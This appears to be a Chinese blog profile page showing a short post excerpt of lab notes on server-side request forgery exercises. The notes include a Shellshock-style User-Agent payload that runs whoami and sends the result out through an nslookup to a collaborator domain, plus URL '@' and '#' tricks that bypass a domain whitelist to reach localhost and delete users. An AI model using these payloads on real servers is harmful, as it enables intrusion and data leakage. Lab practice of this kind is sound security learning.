- 博客(1)
- 收藏
- 关注
RSS订阅原创 SSRF-bp靶场
User-agent()输入 { :;/usr/bin/nslookup $(whoami).bp域名 执行命令。1.要求域名必须是stock.weliketoshop.net(常规的请求地址)在另一翻页处(next product),发现类似的path参数,内容为路径。猜测两处公用一个api(stockApi),构造新的stockApi进行测试。@绕过白名单,解码出来的#锁定127.0.0.1。url中的#:<域名>#<位置标识符>url中的@:<用户名>@<域名>找到删除用户的url,改包放包。
2023-03-26 16:47:18
385
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人